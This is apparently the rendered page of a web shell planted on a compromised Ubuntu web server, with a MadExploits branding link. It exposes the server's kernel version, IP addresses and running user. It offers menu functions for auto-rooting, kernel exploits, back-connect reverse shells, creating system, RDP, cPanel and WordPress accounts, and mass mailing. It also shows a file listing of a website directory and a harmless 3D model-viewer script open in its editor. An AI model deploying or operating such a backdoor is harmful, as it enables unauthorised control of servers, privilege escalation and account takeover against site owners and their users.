Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
sdgases-bak /
regulator /
[ HOME SHELL ]
Name
Size
Permission
Action
ar_hand_prompt.png
11.66
KB
-rw-r--r--
ar_icon.png
679
B
-rw-r--r--
gaslink.glb
21.02
MB
-rw-r--r--
index.html
1.09
KB
-rw-r--r--
poster.webp
6.32
KB
-rw-r--r--
script.js
587
B
-rw-r--r--
snippet.txt
510
B
-rw-r--r--
styles.css
2.02
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : script.js
// Handles loading the events for <model-viewer>'s slotted progress bar const onProgress = (event) => { const progressBar = event.target.querySelector('.progress-bar'); const updatingBar = event.target.querySelector('.update-bar'); updatingBar.style.width = `${event.detail.totalProgress * 100}%`; if (event.detail.totalProgress === 1) { progressBar.classList.add('hide'); event.target.removeEventListener('progress', onProgress); } else { progressBar.classList.remove('hide'); } }; document.querySelector('model-viewer').addEventListener('progress', onProgress);
Close